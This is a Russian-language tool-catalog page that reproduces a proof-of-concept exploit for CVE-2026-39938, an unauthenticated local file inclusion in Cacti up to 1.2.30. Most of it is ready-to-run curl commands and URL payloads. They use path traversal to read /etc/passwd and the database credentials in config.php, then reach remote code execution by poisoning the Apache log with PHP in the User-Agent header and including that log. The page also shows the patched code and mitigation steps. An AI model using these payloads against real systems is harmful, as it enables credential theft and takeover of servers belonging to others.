Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
By-Poloss..-..CVE-2026-39938 — Эксплойт proof-of-concept для CVE-2026-39938: неавторизованное включение локальных файлов в Cacti <= 1.2.30, обеспечивающее чтение произвольных файлов и удаленное выполнение кода через отравление логов. | Kitploit
Инструменты/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

Эксплойт proof-of-concept для CVE-2026-39938: неавторизованное включение локальных файлов в Cacti <= 1.2.30, обеспечивающее чтение произвольных файлов и удаленное выполнение кода через отравление логов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

CVE-2026-39938: Cacti <= 1.2.30 - LFI без аутентификации

Краткое описание

ПолеЗначение
CVE IDCVE-2026-39938
CVSS Score9.8 (Critical)
Affected ProductCacti
Affected Versions<= 1.2.30
Patched Version1.2.31
Fix Commit9871f0c

Детали уязвимости

Первопричина

Уязвимость существует в lib/rrd.php, где параметр graph_theme используется напрямую без санитизации:

УЯЗВИМЫЙ КОД:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

ИСПРАВЛЕННЫЙ КОД:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

Проблема: отсутствие проверки на последовательности обхода пути ../, что позволяет злоумышленникам читать произвольные файлы без аутентификации.


Доказательство концепции (PoC) - Простые шаги

Шаг 1: Проверка уязвимости - чтение /etc/passwd

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

Результат: Содержимое /etc/passwd будет отображено в ответе.

Шаг 2: Чтение конфигурации базы данных

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

Результат: Учётные данные базы данных (имя пользователя, пароль) будут раскрыты.

Шаг 3: Удалённое выполнение кода через отравление логов

3.1 Внедрение PHP-кода в лог Apache

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 Выполнение кода путём включения файла лога

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

Результат: Вывод команды (например, uid=33(www-data)) будет отображён.


Проверенные обычные конечные точки


Примеры URL PoC

Базовый тест LFI

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

Чтение конфигурации приложения

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

Отравление логов (внедрение)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

С заголовком: User-Agent: <?php system('id'); ?>

Отравление логов (выполнение)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

Исправление

Обновление до исправленной версии

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

Проверка применения патча

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

Временное смягчение (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

Ссылки

  • GitHub Security Advisory
  • Patch Commit 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • W.P.E.F Telegram chanel #1
  • W.P.E.F Telegram chanel #2

Отчёт создан в целях исследования безопасности Дата: 27 июня 2026 года

Скачать инструмент
Конечная точкаПараметрПример полезной нагрузки
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log